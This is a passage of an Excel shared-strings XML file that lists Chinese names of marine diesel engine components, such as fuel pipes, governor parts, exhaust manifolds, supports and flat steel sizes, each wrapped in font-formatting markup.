      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油高压管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴定位环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管绝缘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧加载控制杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆柱销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧，扩展</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴挡圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷传感器布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器控制图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子调速器执行器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机控制系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装轨</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其它型钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">0-4mm) </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>触发环和传感器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气集管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓连接的进气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>观测盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管检修孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>10-14mm)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特质螺纹螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔热装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘条</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔热材料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘箔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝热框架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铆钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔热板布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲孔板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前防护</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>罩壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>15-19mm)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个管子的钢软管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>印刷电路板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压管布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘夹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管，外径</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>100</t>
    </r>
  </si>
  <si>
    <r>
      <t>I</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种类型角支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变径接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>丝网印刷</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气箱附件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发光二极管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑油系统泵站</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内锥形物</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹连接球阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆形盲法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带液位开关的泄放盒</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油伞形密封回油主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油调节阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角钢支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水出水管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>40-49mm)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水固定支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧中部支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后部上部支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧上部支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>20-29mm)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧下部支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平面支撑板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺纹支柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水雾截留器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>埋头铆钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主起动空气阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁止板定位销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气管布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气分配器盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱灭火</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>母异径接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器法兰接口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
